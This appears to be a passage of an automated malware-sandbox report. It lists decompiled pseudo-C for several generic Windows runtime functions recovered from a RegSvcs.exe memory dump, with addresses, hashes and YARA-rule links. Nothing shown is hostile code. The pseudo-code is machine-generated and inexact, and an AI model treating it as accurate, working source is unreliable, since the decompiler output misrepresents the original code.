							E01376B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E01376B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E01317D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E01339AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0133B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L01314620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                          0x01377016
                                          0x0137701e
                                          0x0137702b
                                          0x01377033
                                          0x01377037
                                          0x0137703c
                                          0x0137703e
                                          0x01377041
                                          0x01377045
                                          0x0137704a
                                          0x01377050
                                          0x01377055
                                          0x0137705a
                                          0x01377062
                                          0x01377062
                                          0x0137705a
                                          0x01377064
                                          0x01377064
                                          0x01377067
                                          0x01377071
                                          0x01377096
                                          0x0137709b
                                          0x013770a2
                                          0x013770a6
                                          0x013770a7
                                          0x013770ad
                                          0x013770b3
                                          0x013770b6
                                          0x013770bb
                                          0x013770c3
                                          0x013770c3
                                          0x013770c6
                                          0x013770cd
                                          0x013770dd
                                          0x013770e0
                                          0x013770e2
                                          0x013770e2
                                          0x013770ee
                                          0x01377101
                                          0x013770f0
                                          0x013770f9
                                          0x013770f9
                                          0x0137710a
                                          0x0137710e
                                          0x01377112
                                          0x01377117
                                          0x01377118
                                          0x01377118
                                          0x013770bb
                                          0x0137711d
                                          0x01377123
                                          0x01377131
                                          0x01377131
                                          0x01377136
                                          0x0137713d
                                          0x0137713e
                                          0x0137713f
                                          0x0137714a
                                          0x0137714a
                                          0x01377084
                                          0x01377088
                                          0x00000000
                                          0x0137708e
                                          0x0137708e
                                          0x01377092
                                          0x00000000
                                          0x01377092

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b47634773d8f739a73d301d2c761f3adaba860c53708a4c1c4f837f2d31df4b0
                                          • Instruction ID: 27fd0e801b35c34d286e5e2f586b8c7a015f5c6609ccd4ecb085722de15ec0dd
                                          • Opcode Fuzzy Hash: b47634773d8f739a73d301d2c761f3adaba860c53708a4c1c4f837f2d31df4b0
                                          • Instruction Fuzzy Hash: FA31C2726047519FD331DF2CC844A6AB7E9BFC8704F044A29F99587690E734E904CBA6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0132A70E Relevance: .1, Instructions: 96COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E0132A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x13e7b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x13e7b10 = 8;
					 *0x13e7b14 = 0x13e7b0c;
					 *0x13e7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E0132A990(0x13e7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0132A840(__edx, __ecx, __ecx, _t52, 0x13e7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x13e7b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x13e7b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x13e7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L01314620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x13e7b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E0133F3E0(_t50,  *0x13e7b14, _t8 >> 3);
						_t28 =  *0x13e7b14; // 0x0
						__eflags = _t28 - 0x13e7b0c;
						if(_t28 != 0x13e7b0c) {
							L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x13e7b14 = _t50;
						_t48 = _v12;
						 *0x13e7b10 = _t9;
						goto L6;
					}
					 *0x13e7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                          0x0132a713
                                          0x0132a714
                                          0x0132a717
                                          0x0132a71d
                                          0x0132a720
                                          0x0132a722
                                          0x0132a727
                                          0x0132a74a
                                          0x0132a754
                                          0x0132a75e
                                          0x0132a768
                                          0x0132a76a
                                          0x0132a773
                                          0x0132a78b
                                          0x0132a790
                                          0x0132a792
                                          0x0132a741
                                          0x0132a741
                                          0x0132a743
                                          0x0132a749
                                          0x0132a749
                                          0x0132a732
                                          0x0132a73a
                                          0x0132a797
                                          0x0132a79d
                                          0x0132a7a3
                                          0x0132a7a9
                                          0x0132a7b6
                                          0x0132a7bc
                                          0x0132a7ca
                                          0x0132a7e0
                                          0x0132a7e2
                                          0x0132a7e4
                                          0x01369bf2
                                          0x00000000
                                          0x01369bf2
                                          0x0132a7ed
                                          0x0132a7f2
                                          0x0132a800
                                          0x0132a805
                                          0x0132a80d
                                          0x0132a812
                                          0x01369c08
                                          0x01369c08
                                          0x0132a818
                                          0x0132a81b
                                          0x0132a821
                                          0x0132a824
                                          0x00000000
                                          0x0132a824
                                          0x0132a7ae
                                          0x00000000
                                          0x0132a7ae
                                          0x0132a73c
                                          0x0132a73e
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fe1cd3decde2bd539ef2c10cded2e94be022fbc28df17b90d691c76615aaa45a
                                          • Instruction ID: 27e0c22ad3900bf1d0929e83add56466952dc4262d0566fdc7215fe5b5057274
                                          • Opcode Fuzzy Hash: fe1cd3decde2bd539ef2c10cded2e94be022fbc28df17b90d691c76615aaa45a
                                          • Instruction Fuzzy Hash: 6231AEB16003169FDB31DB5CE880F657BFDFB84718F14495AE2168B684D7709901CBD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013261A0 Relevance: .1, Instructions: 93COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 97%
                                          			E013261A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E01325E50(0x12d67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E013C9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E012FF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                          0x013261b3
                                          0x013261b5
                                          0x013261bd
                                          0x013261c3
                                          0x013261c7
                                          0x013261d2
                                          0x013261ff
                                          0x013261ff
                                          0x01326201
                                          0x01326207
                                          0x01326207
                                          0x013261d4
                                          0x013261d9
                                          0x00000000
                                          0x00000000
                                          0x013261df
                                          0x013261e2
                                          0x00000000
                                          0x00000000
                                          0x013261e6
                                          0x013261e8
                                          0x013261ee
                                          0x013261ee
                                          0x013261f9
                                          0x0136762f
                                          0x01367632
                                          0x01367635
                                          0x01367639
                                          0x01367640
                                          0x0136766e
                                          0x01367675
                                          0x00000000
                                          0x00000000
                                          0x01367681
                                          0x01367689
                                          0x0136768d
                                          0x01367691
                                          0x01367695
                                          0x01367699
                                          0x013676af
                                          0x013676b5
                                          0x013676b7
                                          0x013676b7
                                          0x013676d7
                                          0x013676dc
                                          0x00000000
                                          0x013676dc
                                          0x013676a2
                                          0x013676a9
                                          0x01367651
                                          0x01367653
                                          0x01367653
                                          0x01367656
                                          0x01367656
                                          0x00000000
                                          0x01367656
                                          0x01367644
                                          0x01367646
                                          0x01367648
                                          0x01367648
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 31ec6520eca048b51d8bc135bf46fd69aeba5a381c4cbcc99ff114e73a4adf04
                                          • Instruction ID: 510fd29dfe544a9dd0905f04cb1a628b5eb8af6d0912278dc8e3fbeebe4dc9b5
                                          • Opcode Fuzzy Hash: 31ec6520eca048b51d8bc135bf46fd69aeba5a381c4cbcc99ff114e73a4adf04
                                          • Instruction Fuzzy Hash: 3E315AB16057118FE320DF1DC900B26BBE9EF88B18F55896DE9989B251E7B0E804CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 012FAA16 Relevance: .1, Instructions: 93COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 95%
                                          			E012FAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x13ed360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x13e7b9c; // 0x0
					_t53 = L01314620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0133B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0133F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L01306C59(_t53, _t51, _t58) != 0) {
							_t28 = E01325E50(0x12dc338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0132B230(_v32, _v28, 0x12dc2d8, 1,  &_v24);
								_t28 = E012FF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                          0x012faa25
                                          0x012faa29
                                          0x012faa2d
                                          0x012faa30
                                          0x012faa37
                                          0x012faa3c
                                          0x01354458
                                          0x01354458
                                          0x01354472
                                          0x01354474
                                          0x01354476
                                          0x012faa64
                                          0x012faa74
                                          0x0135447c
                                          0x01354483
                                          0x01354492
                                          0x012faa52
                                          0x012faa54
                                          0x012faa5e
                                          0x013544a8
                                          0x013544ad
                                          0x013544af
                                          0x013544b6
                                          0x013544b6
                                          0x013544b9
                                          0x013544bc
                                          0x013544cd
                                          0x013544d3
                                          0x013544d6
                                          0x013544e1
                                          0x013544e1
                                          0x013544e6
                                          0x013544e8
                                          0x013544fb
                                          0x013544fb
                                          0x013544e8
                                          0x00000000
                                          0x012faa5e
                                          0x01354476
                                          0x012faa42
                                          0x012faa46
                                          0x012faa48
                                          0x012faa4c
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cfc731ad4f4e40630fde1bde4abb7502e9423cfdc142a691984983ac9bfddb2b
                                          • Instruction ID: 0a5aec3461a557695a1508f5498cb27135f577d152a1f053ed20ad078f3d8869
                                          • Opcode Fuzzy Hash: cfc731ad4f4e40630fde1bde4abb7502e9423cfdc142a691984983ac9bfddb2b
                                          • Instruction Fuzzy Hash: E631E5B1A1021AABCF15DF68CD41ABFB7B8EF44704F00446DF905E7254E7749955CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01338EC7 Relevance: .1, Instructions: 92COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E01338EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x13ed360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E01324E70(0x13e86e4, 0x1339490, 0, 0);
					if( *0x13e53e8 > 5 && E01338F33(0x13e53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x13e53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x13e53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x12dbc46;
						_t48 = E01377B9C(0x13e53e8, 0x12dbc46, _t67, 0x13e53e8, _t70,  &_v140);
					}
				}
				return E0133B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                          0x01338ec7
                                          0x01338ed9
                                          0x01338edc
                                          0x01338ee6
                                          0x01338ee9
                                          0x01338eee
                                          0x01338efc
                                          0x01338f08
                                          0x01371349
                                          0x01371353
                                          0x0137135d
                                          0x01371366
                                          0x0137136f
                                          0x01371375
                                          0x0137137c
                                          0x01371385
                                          0x01371390
                                          0x01371391
                                          0x0137139c
                                          0x0137139d
                                          0x013713a6
                                          0x013713ac
                                          0x013713b2
                                          0x013713b5
                                          0x013713bc
                                          0x013713bf
                                          0x013713c2
                                          0x013713c5
                                          0x013713c8
                                          0x013713cb
                                          0x013713ce
                                          0x013713d1
                                          0x013713d4
                                          0x013713d7
                                          0x013713da
                                          0x013713dd
                                          0x013713e0
                                          0x013713e3
                                          0x013713e6
                                          0x013713e9
                                          0x013713f6
                                          0x01371400
                                          0x01371400
                                          0x01338f08
                                          0x01338f32

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5b0609381ea0c5739ee358953646a5a99cd6e8cf24ae6dfc3bb8a3de7341367d
                                          • Instruction ID: 2b98046af476364a37d1e0a42735d654371a1a42aac1fdac57975cca263d44ef
                                          • Opcode Fuzzy Hash: 5b0609381ea0c5739ee358953646a5a99cd6e8cf24ae6dfc3bb8a3de7341367d
                                          • Instruction Fuzzy Hash: E04182B5D0031C9EDB20CFAAD981AADFBF8FB48714F5041AEE509A7640D7745A44CF54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0132E730 Relevance: .1, Instructions: 89COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 74%
                                          			E0132E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E01339670() < 0) {
					E0134DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x13e7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L01314620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0132E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                          0x0132e730
                                          0x0132e736
                                          0x0132e738
                                          0x0132e73d
                                          0x0132e73e
                                          0x0132e740
                                          0x0132e749
                                          0x0132e765
                                          0x0132e76a
                                          0x0132e76b
                                          0x0132e76c
                                          0x0132e76d
                                          0x0132e76e
                                          0x0132e76f
                                          0x0132e775
                                          0x0132e777
                                          0x0132e77e
                                          0x0136b675
                                          0x0132e784
                                          0x0132e784
                                          0x0132e789
                                          0x0132e7a8
                                          0x0132e7ac
                                          0x0132e807
                                          0x0132e7ae
                                          0x0132e7ae
                                          0x0132e7b1
                                          0x0132e7b4
                                          0x0132e7b9
                                          0x0132e7c0
                                          0x0132e7c4
                                          0x0132e7ca
                                          0x0132e7cc
                                          0x00000000
                                          0x0132e7d3
                                          0x0132e7d6
                                          0x00000000
                                          0x00000000
                                          0x0132e7ff
                                          0x0132e802
                                          0x00000000
                                          0x00000000
                                          0x0132e7f9
                                          0x0132e7fc
                                          0x00000000
                                          0x00000000
                                          0x0132e7f3
                                          0x0132e7f6
                                          0x00000000
                                          0x00000000
                                          0x0132e7ed
                                          0x0132e7f0
                                          0x00000000
                                          0x00000000
                                          0x0132e7e7
                                          0x0132e7ea
                                          0x00000000
                                          0x00000000
                                          0x0136b685
                                          0x0136b688
                                          0x00000000
                                          0x00000000
                                          0x0136b682
                                          0x00000000
                                          0x00000000
                                          0x0132e7cc
                                          0x0132e7d9
                                          0x0132e7dc
                                          0x0132e7de
                                          0x0132e7de
                                          0x0132e7ac
                                          0x0132e7e4
                                          0x0132e74b
                                          0x0132e751
                                          0x0132e759
                                          0x0132e761
                                          0x0132e761

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a85c24bf523f3a8d56a346c0921b91da560e14ce5c9ea003611b902ecc7a72e5
                                          • Instruction ID: ebcec851f07696dfdf0bd0530e369cd2378f228a6383b53eb585f15fbaa9bf91
                                          • Opcode Fuzzy Hash: a85c24bf523f3a8d56a346c0921b91da560e14ce5c9ea003611b902ecc7a72e5
                                          • Instruction Fuzzy Hash: BA318C75A14249EFD704DF5CC841B9ABBE8FB08328F14826AFA04CB341D671EC80CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0132BC2C Relevance: .1, Instructions: 88COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 67%
                                          			E0132BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x13e6100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E01312280(0xd, 0x637f1a0);
				_t41 =  *0x13e60f8; // 0x0
				if(_t41 != 0) {
					 *0x13e60f8 =  *_t41;
					 *0x13e60fc =  *0x13e60fc + 0xffff;
				}
				E0130FFB0(_t41, 0x800, 0x637f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x13e60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L01314620(0x13e6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x13e6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                          0x0132bc36
                                          0x0132bc42
                                          0x0132bc45
                                          0x0132bc4a
                                          0x0132bd35
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0132bc50
                                          0x0132bc50
                                          0x0132bc58
                                          0x0132bc5a
                                          0x0132bc60
                                          0x00000000
                                          0x00000000
                                          0x0136a4f2
                                          0x0136a4f6
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0136a4fc
                                          0x0132bc79
                                          0x0132bc7e
                                          0x0132bc86
                                          0x0132bd16
                                          0x0132bd20
                                          0x0132bd20
                                          0x0132bc8d
                                          0x0132bc94
                                          0x0132bcbd
                                          0x0132bcca
                                          0x0132bccb
                                          0x0132bccc
                                          0x0132bccd
                                          0x0132bcce
                                          0x0132bcd4
                                          0x0132bcea
                                          0x0132bcee
                                          0x0132bcf2
                                          0x0132bd00
                                          0x0132bd04
                                          0x00000000
                                          0x0132bc96
                                          0x0132bcab
                                          0x0132bcaf
                                          0x0132bd2c
                                          0x0132bd2c
                                          0x0132bd09
                                          0x00000000
                                          0x0132bd09
                                          0x0132bcb1
                                          0x0132bcb5
                                          0x0132bcbb
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0132bcbb

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
